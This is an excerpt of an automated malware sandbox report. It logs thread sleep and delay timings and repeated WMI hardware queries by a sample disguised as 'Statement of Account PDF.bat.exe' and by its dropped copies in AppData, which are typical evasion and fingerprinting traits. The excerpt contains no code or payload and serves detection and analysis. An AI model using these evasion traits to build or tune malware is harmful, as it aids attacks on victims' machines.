                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97135s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199949s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199498s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199170s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1199062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198843s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198624s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198295s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198187s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1198078s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1197968s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1197856s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1197734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1197625s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1197515s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -1197406s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -33204139332677172s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99637s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -99063s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98844s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98610s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98485s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98329s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98154s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -98042s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -97723s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -97594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -97485s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -97358s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -97163s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199951s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199839s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199473s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199335s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199219s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1199105s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1198956s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1198828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1198719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1198411s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1198281s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1198172s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1198062s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197953s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197844s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197734s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197621s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197391s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197276s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1197047s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196936s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196719s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7948Thread sleep time: -1196375s >= -30000s
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99874Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99763Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99656Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99546Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99437Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99316Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99187Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 99070Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98953Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98841Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98734Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98624Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98515Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98404Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98296Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98184Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 98078Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97968Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97859Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97749Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97640Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97531Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97421Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97312Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97203Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 97087Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 96984Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199874Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199765Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199546Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199437Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199328Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199214Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198999Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198890Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198781Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198671Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198551Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198421Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198312Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198192Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198062Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197952Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197839Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197733Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197624Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197514Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 99766
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 99657
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 99423
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 99297
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 99188
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 99077
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 98936
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 98828
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 98308
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 98203
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 98094
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 97969
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 95957
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 95829
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199887
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199770
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199637
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199527
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199418
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199308
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199199
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199090
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198980
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198871
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198746
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198595
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198465
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198355
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198245
